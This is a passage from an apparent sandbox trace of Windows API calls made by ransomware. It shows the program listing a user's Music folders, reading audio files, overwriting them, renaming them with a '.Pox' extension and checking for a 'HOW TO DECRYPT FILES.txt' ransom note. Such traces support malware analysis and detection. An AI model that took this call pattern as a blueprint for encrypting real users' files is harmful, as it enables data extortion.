(in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\yGHv\\PkOkNYdIK1Akl.mp3", nBufferLength=0x105, lpBuffer=0x3ade58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\yGHv\\PkOkNYdIK1Akl.mp3", lpFilePart=0x0) returned 0x47 [0040.998] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae34c) returned 1 [0040.998] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\yGHv\\PkOkNYdIK1Akl.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\fbbg9d\\pkold\\yghv\\pkoknydik1akl.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.999] GetFileType (hFile=0x26c) returned 0x1 [0040.999] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae348) returned 1 [0040.999] GetFileType (hFile=0x26c) returned 0x1 [0040.999] WriteFile (in: hFile=0x26c, lpBuffer=0x23fd6c0*, nNumberOfBytesToWrite=0x105e0, lpNumberOfBytesWritten=0x3ae408, lpOverlapped=0x0 | out: lpBuffer=0x23fd6c0*, lpNumberOfBytesWritten=0x3ae408*=0x105e0, lpOverlapped=0x0) returned 1 [0041.001] CloseHandle (hObject=0x26c) returned 1 [0041.002] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\yGHv\\PkOkNYdIK1Akl.mp3", nBufferLength=0x105, lpBuffer=0x3adf8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\yGHv\\PkOkNYdIK1Akl.mp3", lpFilePart=0x0) returned 0x47 [0041.002] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\yGHv\\PkOkNYdIK1Akl.mp3.Pox", nBufferLength=0x105, lpBuffer=0x3adf8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\yGHv\\PkOkNYdIK1Akl.mp3.Pox", lpFilePart=0x0) returned 0x4b [0041.002] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3ec) returned 1 [0041.002] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\yGHv\\PkOkNYdIK1Akl.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\fbbg9d\\pkold\\yghv\\pkoknydik1akl.mp3"), fInfoLevelId=0x0, lpFileInformation=0x3ae468 | out: lpFileInformation=0x3ae468*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf831290, ftCreationTime.dwHighDateTime=0x1d4d311, ftLastAccessTime.dwLowDateTime=0x39a32300, ftLastAccessTime.dwHighDateTime=0x1d4cf46, ftLastWriteTime.dwLowDateTime=0x2aa04ec0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x105e0)) returned 1 [0041.002] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3e8) returned 1 [0041.002] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\yGHv\\PkOkNYdIK1Akl.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\fbbg9d\\pkold\\yghv\\pkoknydik1akl.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\yGHv\\PkOkNYdIK1Akl.mp3.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\fbbg9d\\pkold\\yghv\\pkoknydik1akl.mp3.pox")) returned 1 [0041.003] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5a4) returned 1 [0041.003] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OTVDMA8CV6qQ", nBufferLength=0x105, lpBuffer=0x3ae0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OTVDMA8CV6qQ", lpFilePart=0x0) returned 0x30 [0041.003] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OTVDMA8CV6qQ\\", nBufferLength=0x105, lpBuffer=0x3ae080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OTVDMA8CV6qQ\\", lpFilePart=0x0) returned 0x31 [0041.003] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OTVDMA8CV6qQ\\*", lpFindFileData=0x3ae2cc | out: lpFindFileData=0x3ae2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b39a7f0, ftCreationTime.dwHighDateTime=0x1d4d122, ftLastAccessTime.dwLowDateTime=0xf88d5ff0, ftLastAccessTime.dwHighDateTime=0x1d4c948, ftLastWriteTime.dwLowDateTime=0xf88d5ff0, ftLastWriteTime.dwHighDateTime=0x1d4c948, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406088 [0041.003] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b39a7f0, ftCreationTime.dwHighDateTime=0x1d4d122, ftLastAccessTime.dwLowDateTime=0xf88d5ff0, ftLastAccessTime.dwHighDateTime=0x1d4c948, ftLastWriteTime.dwLowDateTime=0xf88d5ff0, ftLastWriteTime.dwHighDateTime=0x1d4c948, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.003] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41994570, ftCreationTime.dwHighDateTime=0x1d4cc54, ftLastAccessTime.dwLowDateTime=0x6c0e5020, ftLastAccessTime.dwHighDateTime=0x1d4ceca, ftLastWriteTime.dwLowDateTime=0x6c0e5020, ftLastWriteTime.dwHighDateTime=0x1d4ceca, nFileSizeHigh=0x0, nFileSizeLow=0x885b, dwReserved0=0x0, dwReserved1=0x0, cFileName="pfj2KiOIW.m4a", cAlternateFileName="PFJ2KI~1.M4A")) returned 1 [0041.003] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf54c2350, ftCreationTime.dwHighDateTime=0x1d4cf09, ftLastAccessTime.dwLowDateTime=0xe87bb810, ftLastAccessTime.dwHighDateTime=0x1d4cdd4, ftLastWriteTime.dwLowDateTime=0xe87bb810, ftLastWriteTime.dwHighDateTime=0x1d4cdd4, nFileSizeHigh=0x0, nFileSizeLow=0x2747, dwReserved0=0x0, dwReserved1=0x0, cFileName="SHv2e.mp3", cAlternateFileName="")) returned 1 [0041.004] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf89880, ftCreationTime.dwHighDateTime=0x1d4d094, ftLastAccessTime.dwLowDateTime=0x744b9e90, ftLastAccessTime.dwHighDateTime=0x1d4cf16, ftLastWriteTime.dwLowDateTime=0x744b9e90, ftLastWriteTime.dwHighDateTime=0x1d4cf16, nFileSizeHigh=0x0, nFileSizeLow=0x13963, dwReserved0=0x0, dwReserved1=0x0, cFileName="wbO_TkLiKS7APKmTnXi.wav", cAlternateFileName="WBO_TK~1.WAV")) returned 1 [0041.004] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed010220, ftCreationTime.dwHighDateTime=0x1d4d142, ftLastAccessTime.dwLowDateTime=0x5a935a40, ftLastAccessTime.dwHighDateTime=0x1d4d585, ftLastWriteTime.dwLowDateTime=0x5a935a40, ftLastWriteTime.dwHighDateTime=0x1d4d585, nFileSizeHigh=0x0, nFileSizeLow=0x14219, dwReserved0=0x0, dwReserved1=0x0, cFileName="wTqw.mp3", cAlternateFileName="")) returned 1 [0041.004] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0041.004] FindClose (in: hFindFile=0x406088 | out: hFindFile=0x406088) returned 1 [0041.004] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae564) returned 1 [0041.004] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae570) returned 1 [0041.004] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5a4) returned 1 [0041.004] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OTVDMA8CV6qQ", nBufferLength=0x105, lpBuffer=0x3ae0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OTVDMA8CV6qQ", lpFilePart=0x0) returned 0x30 [0041.004] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OTVDMA8CV6qQ\\", nBufferLength=0x105, lpBuffer=0x3ae080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OTVDMA8CV6qQ\\", lpFilePart=0x0) returned 0x31 [0041.004] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OTVDMA8CV6qQ\\*", lpFindFileData=0x3ae2cc | out: lpFindFileData=0x3ae2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b39a7f0, ftCreationTime.dwHighDateTime=0x1d4d122, ftLastAccessTime.dwLowDateTime=0xf88d5ff0, ftLastAccessTime.dwHighDateTime=0x1d4c948, ftLastWriteTime.dwLowDateTime=0xf88d5ff0, ftLastWriteTime.dwHighDateTime=0x1d4c948, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406088 [0041.005] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b39a7f0, ftCreationTime.dwHighDateTime=0x1d4d122, ftLastAccessTime.dwLowDateTime=0xf88d5ff0, ftLastAccessTime.dwHighDateTime=0x1d4c948, ftLastWriteTime.dwLowDateTime=0xf88d5ff0, ftLastWriteTime.dwHighDateTime=0x1d4c948, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.005] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41994570, ftCreationTime.dwHighDateTime=0x1d4cc54, ftLastAccessTime.dwLowDateTime=0x6c0e5020, ftLastAccessTime.dwHighDateTime=0x1d4ceca, ftLastWriteTime.dwLowDateTime=0x6c0e5020, ftLastWriteTime.dwHighDateTime=0x1d4ceca, nFileSizeHigh=0x0, nFileSizeLow=0x885b, dwReserved0=0x0, dwReserved1=0x0, cFileName="pfj2KiOIW.m4a", cAlternateFileName="PFJ2KI~1.M4A")) returned 1 [0041.005] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf54c2350, ftCreationTime.dwHighDateTime=0x1d4cf09, ftLastAccessTime.dwLowDateTime=0xe87bb810, ftLastAccessTime.dwHighDateTime=0x1d4cdd4, ftLastWriteTime.dwLowDateTime=0xe87bb810, ftLastWriteTime.dwHighDateTime=0x1d4cdd4, nFileSizeHigh=0x0, nFileSizeLow=0x2747, dwReserved0=0x0, dwReserved1=0x0, cFileName="SHv2e.mp3", cAlternateFileName="")) returned 1 [0041.005] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf89880, ftCreationTime.dwHighDateTime=0x1d4d094, ftLastAccessTime.dwLowDateTime=0x744b9e90, ftLastAccessTime.dwHighDateTime=0x1d4cf16, ftLastWriteTime.dwLowDateTime=0x744b9e90, ftLastWriteTime.dwHighDateTime=0x1d4cf16, nFileSizeHigh=0x0, nFileSizeLow=0x13963, dwReserved0=0x0, dwReserved1=0x0, cFileName="wbO_TkLiKS7APKmTnXi.wav", cAlternateFileName="WBO_TK~1.WAV")) returned 1 [0041.005] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed010220, ftCreationTime.dwHighDateTime=0x1d4d142, ftLastAccessTime.dwLowDateTime=0x5a935a40, ftLastAccessTime.dwHighDateTime=0x1d4d585, ftLastWriteTime.dwLowDateTime=0x5a935a40, ftLastWriteTime.dwHighDateTime=0x1d4d585, nFileSizeHigh=0x0, nFileSizeLow=0x14219, dwReserved0=0x0, dwReserved1=0x0, cFileName="wTqw.mp3", cAlternateFileName="")) returned 1 [0041.005] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed010220, ftCreationTime.dwHighDateTime=0x1d4d142, ftLastAccessTime.dwLowDateTime=0x5a935a40, ftLastAccessTime.dwHighDateTime=0x1d4d585, ftLastWriteTime.dwLowDateTime=0x5a935a40, ftLastWriteTime.dwHighDateTime=0x1d4d585, nFileSizeHigh=0x0, nFileSizeLow=0x14219, dwReserved0=0x0, dwReserved1=0x0, cFileName="wTqw.mp3", cAlternateFileName="")) returned 0 [0041.006] FindClose (in: hFindFile=0x406088 | out: hFindFile=0x406088) returned 1 [0041.006] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae564) returned 1 [0041.006] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae570) returned 1 [0041.006] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OTVDMA8CV6qQ\\SHv2e.mp3", nBufferLength=0x105, lpBuffer=0x3adf54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OTVDMA8CV6qQ\\SHv2e.mp3", lpFilePart=0x0) returned 0x3a [0041.006] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae448) returned 1 [0041.006] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OTVDMA8CV6qQ\\SHv2e.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\otvdma8cv6qq\\shv2e.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.006] GetFileType (hFile=0x26c) returned 0x1 [0041.006] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae444) returned 1 [0041.006] GetFileType (hFile=0x26c) returned 0x1 [0041.006] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae550 | out: lpFileSizeHigh=0x3ae550*=0x0) returned 0x2747 [0041.006] ReadFile (in: hFile=0x26c, lpBuffer=0x24100c4, nNumberOfBytesToRead=0x2747, lpNumberOfBytesRead=0x3ae4fc, lpOverlapped=0x0 | out: lpBuffer=0x24100c4*, lpNumberOfBytesRead=0x3ae4fc*=0x2747, lpOverlapped=0x0) returned 1 [0041.007] CloseHandle (hObject=0x26c) returned 1 [0041.056] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae068, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0041.056] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4c8) returned 1 [0041.056] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae544 | out: lpFileInformation=0x3ae544*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.056] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4c4) returned 1 [0041.056] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OTVDMA8CV6qQ\\SHv2e.mp3", nBufferLength=0x105, lpBuffer=0x3adf40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OTVDMA8CV6qQ\\SHv2e.mp3", lpFilePart=0x0) returned 0x3a [0041.056] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae434) returned 1 [0041.056] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OTVDMA8CV6qQ\\SHv2e.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\otvdma8cv6qq\\shv2e.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.057] GetFileType (hFile=0x26c) returned 0x1 [0041.057] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae430) returned 1 [0041.057] GetFileType (hFile=0x26c) returned 0x1 [0041.057] WriteFile (in: hFile=0x26c, lpBuffer=0x246949c*, nNumberOfBytesToWrite=0x2750, lpNumberOfBytesWritten=0x3ae4f0, lpOverlapped=0x0 | out: lpBuffer=0x246949c*, lpNumberOfBytesWritten=0x3ae4f0*=0x2750, lpOverlapped=0x0) returned 1 [0041.058] CloseHandle (hObject=0x26c) returned 1 [0041.059] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OTVDMA8CV6qQ\\SHv2e.mp3", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OTVDMA8CV6qQ\\SHv2e.mp3", lpFilePart=0x0) returned 0x3a [0041.059] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OTVDMA8CV6qQ\\SHv2e.mp3.Pox", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OTVDMA8CV6qQ\\SHv2e.mp3.Pox", lpFilePart=0x0) returned 0x3e [0041.059] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4d4) returned 1 [0041.059] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OTVDMA8CV6qQ\\SHv2e.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\otvdma8cv6qq\\shv2e.mp3"), fInfoLevelId=0x0, lpFileInformation=0x3ae550 | out: lpFileInformation=0x3ae550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf54c2350, ftCreationTime.dwHighDateTime=0x1d4cf09, ftLastAccessTime.dwLowDateTime=0xe87bb810, ftLastAccessTime.dwHighDateTime=0x1d4cdd4, ftLastWriteTime.dwLowDateTime=0x2aa772e0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x2750)) returned 1 [0041.059] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4d0) returned 1 [0041.060] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OTVDMA8CV6qQ\\SHv2e.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\otvdma8cv6qq\\shv2e.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OTVDMA8CV6qQ\\SHv2e.mp3.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\otvdma8cv6qq\\shv2e.mp3.pox")) returned 1 [0041.060] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OTVDMA8CV6qQ\\wTqw.mp3", nBufferLength=0x105, lpBuffer=0x3adf54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OTVDMA8CV6qQ\\wTqw.mp3", lpFilePart=0x0) returned 0x39 [0041.060] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae448) returned 1 [0041.060] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OTVDMA8CV6qQ\\wTqw.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\otvdma8cv6qq\\wtqw.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.060] GetFileType (hFile=0x26c) returned 0x1 [0041.060] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae444) returned 1 [0041.060] GetFileType (hFile=0x26c) returned 0x1 [0041.060] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae550 | out: lpFileSizeHigh=0x3ae550*=0x0) returned 0x14219 [0041.061] ReadFile (in: hFile=0x26c, lpBuffer=0x246c15c, nNumberOfBytesToRead=0x14219, lpNumberOfBytesRead=0x3ae4fc, lpOverlapped=0x0 | out: lpBuffer=0x246c15c*, lpNumberOfBytesRead=0x3ae4fc*=0x14219, lpOverlapped=0x0) returned 1 [0041.062] CloseHandle (hObject=0x26c) returned 1 [0041.078] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae068, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0041.078] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4c8) returned 1 [0041.078] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae544 | out: lpFileInformation=0x3ae544*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.078] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4c4) returned 1 [0041.078] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OTVDMA8CV6qQ\\wTqw.mp3", nBufferLength=0x105, lpBuffer=0x3adf40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OTVDMA8CV6qQ\\wTqw.mp3", lpFilePart=0x0) returned 0x39 [0041.078] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae434) returned 1 [0041.078] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OTVDMA8CV6qQ\\wTqw.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\otvdma8cv6qq\\wtqw.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.080] GetFileType (hFile=0x26c) returned 0x1 [0041.080] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae430) returned 1 [0041.080] GetFileType (hFile=0x26c) returned 0x1 [0041.080] WriteFile (in: hFile=0x26c, lpBuffer=0x24f55bc*, nNumberOfBytesToWrite=0x14220, lpNumberOfBytesWritten=0x3ae4f0, lpOverlapped=0x0 | out: lpBuffer=0x24f55bc*, lpNumberOfBytesWritten=0x3ae4f0*=0x14220, lpOverlapped=0x0) returned 1 [0041.081] CloseHandle (hObject=0x26c) returned 1 [0041.083] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OTVDMA8CV6qQ\\wTqw.mp3", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OTVDMA8CV6qQ\\wTqw.mp3", lpFilePart=0x0) returned 0x39 [0041.083] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OTVDMA8CV6qQ\\wTqw.mp3.Pox", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OTVDMA8CV6qQ\\wTqw.mp3.Pox", lpFilePart=0x0) returned 0x3d [0041.083] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4d4) returned 1 [0041.083] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OTVDMA8CV6qQ\\wTqw.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\otvdma8cv6qq\\wtqw.mp3"), fInfoLevelId=0x0, lpFileInformation=0x3ae550 | out: lpFileInformation=0x3ae550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed010220, ftCreationTime.dwHighDateTime=0x1d4d142, ftLastAccessTime.dwLowDateTime=0x5a935a40, ftLastAccessTime.dwHighDateTime=0x1d4d585, ftLastWriteTime.dwLowDateTime=0x2aac35a0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x14220)) returned 1 [0041.083] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4d0) returned 1 [0041.084] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OTVDMA8CV6qQ\\wTqw.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\otvdma8cv6qq\\wtqw.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OTVDMA8CV6qQ\\wTqw.mp3.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\otvdma8cv6qq\\wtqw.mp3.pox")) returned 1 [0041.084] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5a4) returned 1 [0041.084] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm", nBufferLength=0x105, lpBuffer=0x3ae0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm", lpFilePart=0x0) returned 0x2f [0041.084] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\", nBufferLength=0x105, lpBuffer=0x3ae080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\", lpFilePart=0x0) returned 0x30 [0041.084] FindFirstFileW (in: 